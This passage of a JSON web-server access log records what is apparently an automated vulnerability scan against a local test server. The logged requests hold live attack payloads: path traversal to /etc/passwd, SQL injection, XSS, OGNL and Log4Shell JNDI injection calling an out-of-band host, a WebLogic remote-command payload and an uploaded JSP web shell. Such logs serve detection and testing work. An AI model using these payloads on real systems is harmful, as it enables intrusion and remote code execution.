HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log_download.cgi?type=../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/showLogon.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /interlib/report/ShowImage?localPath=C:\x5CWindows\x5Csystem.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nagios3/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/80 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.018","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":" \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_async/AsyncResponseService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log_download.cgi?type=../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/install/index/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cp/Shares?user=&protocol=webaccess&v=2.3 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/portalhelp/en/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\x22connectionHandler\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\x22getServletRequest\x22).invoke(obj); String cmd = req.getHeader(\x22CMD\x22);String[] cmds = System.getProperty(\x22os.name\x22).toLowerCase().contains(\x22window\x22) ? new String[]{\x22cmd.exe\x22, \x22/c\x22, cmd} : new String[]{\x22/bin/sh\x22, \x22-c\x22, cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(\x22\x5C\x5CA\x22).next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\x22getResponse\x22).invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cluster/cluster HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/81 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"username={{username}}&password={{password}}&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /centreon/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"j_username=${jndi:ldap://${hostName}.ca28fg0smpvbd3qg07h0srx6ie8szo9du.oast.live}&j_password=password&logincontext=employee","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mifs/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1/mifs/user/login.jsp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zabbix/index_sso.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/cipher.aes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%\x0D\x0Aif (request.getParameter(\x22cmd\x22) != null) {\x0D\x0A out.println(\x22Command: \x22 + request.getParameter(\x22cmd\x22) + \x22
\x22);\x0D\x0A Process p = Runtime.getRuntime().exec(request.getParameter(\x22cmd\x22));\x0D\x0A OutputStream os = p.getOutputStream();\x0D\x0A InputStream in = p.getInputStream();\x0D\x0A DataInputStream dis = new DataInputStream(in);\x0D\x0A String disr = dis.readLine();\x0D\x0A while ( disr != null ) {\x0D\x0A out.println(disr);\x0D\x0A disr = dis.readLine();\x0D\x0A }\x0D\x0A }\x0D\x0A%>\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /poc.jsp/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/82 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/doenterpagevariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22vehicletitle\x22\x0D\x0A\x0D\x0ATest\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22brandname\x22\x0D\x0A\x0D\x0A1\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22vehicalorcview\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; 